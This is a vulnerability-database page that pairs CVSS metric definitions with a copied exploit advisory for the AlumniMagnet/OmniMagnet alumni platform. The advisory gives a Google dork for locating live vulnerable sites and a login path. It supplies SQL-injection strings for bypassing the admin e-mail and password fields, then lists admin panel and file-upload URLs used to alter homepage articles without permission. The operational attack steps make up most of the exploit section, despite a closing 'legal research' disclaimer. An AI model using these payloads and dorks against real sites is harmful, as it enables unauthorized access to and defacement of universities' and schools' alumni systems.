The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: AlumniMagnet OmniMagnet Improper Access Control Vulnerability
####################################################################
# Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/05/2019
# Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org
# Vulnerability Type : CWE-284 [ Improper Access Control ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
The top alumni associations in the world use AlumniMagnet as their alumni engagement
and volunteer management platform. Made for large universities and colleges, schools
and their chapters. Enterprise Edition involves all of the Central features, but also brings
in connectivity between the university's alumni office and all of its associated
chapters, classes, and clubs.
####################################################################
# Impact :
***********
The software does not restrict or incorrectly restricts access to a resource from
an unauthorized actor.
There are two distinct behaviors that can introduce access control weaknesses:
Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for
either the user or the resource (for example, setting a password file to be world-writable, or
giving administrator capabilities to a guest user). This action could be performed by
the program or the administrator. Performing of activities carried out only by administrator
or program became available for all the users.
Enforcement: the mechanism contains errors that prevent it from properly enforcing the
specified access control requirements (e.g., allowing the user to specify their own privileges, or
allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs
within the program itself, in that it does not actually enforce the intended security
policy that the administrator specifies.
Potential Mitigations
Phases: Architecture and Design; Operation
Very carefully manage the setting, management, and handling of privileges.
Explicitly manage trust zones in the software.
Phase: Architecture and Design
Strategy: Separation of Privilege
Compartmentalize the system to have "safe" areas where trust boundaries can be
unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary
and always be careful when interfacing with a compartment outside of the safe area.
Ensure that appropriate compartmentalization is built into the system design and that
the compartmentalization serves to allow for and further reinforce privilege separation
functionality. Architects and designers should rely on the principle of least privilege
to decide when it is appropriate to use and to drop system privileges.
####################################################################
# Improper Access Control Exploit :
********************************
Non-Alumni Staff Administrator Page Login Path :
*******************************************
/user.html?op=login&non_alum=true
Faculty, Staff, Parents, and Non-Alumni
Members and Guests click here and login below.
Administrator E-Mail Address :
****************************
[email protected]
'or''='@gmail.com
'or''='@yahoo.com
'or''='@hotmail.com
Administrator Password :
***********************
'or''='
' or 1=1 limit 1 -- -+
anything' OR 'x'='x
Useable Admin Control Panel Links :
********************************
We can change the articles on the homepage
without administrator permission.
/admin_article.html
/article.html?aid=[ID-NUMBER]
/admin_article.html?op=edit&aid=[ID-NUMBER]
/admin_files.html
/admin_files.html?sub_op=upload_files
Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12
Upload a File. Click Manage Uploads.
At the bottom of the page you can see the link showing where the image is going.
/images/vault/[ID-NUMBER].jpg
Look at File Destination => 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
array (
'captcha' =>
array (
0 => '[RANDOM-ID-NUMBER]',
),
'current_user' => '1',
'current_user_first_name' => 'Magnet',
'current_user_aux_id' => '',
'current_user_permissions' => '[RANDOM-ID-NUMBER]',
'current_user_email' => '[email protected]',
'current_user_nickname' => 'Magnet Team',
'signed_in_at' => '[DOMAIN-ADDRESS-HERE]',
'main_code' => NULL,
'last_update_date' => '[RANDOM-ID-NUMBER]',
'current_user_authenticated' => 'y',
'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files',
'file_dest' => 'images/vault/[ID-NUMBER].jpg',
Sometimes it gives error like this -
Then you cannot have an admin account.
************************************
Access denied...
The page you requested requires staff clearance.
Make sure you are logged into the system before you proceed.
If you feel that this is an error, please contact an admin.
Authentication Error
Error code 201
The email/password combination you have entered does not match.
Please check your records and try again.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum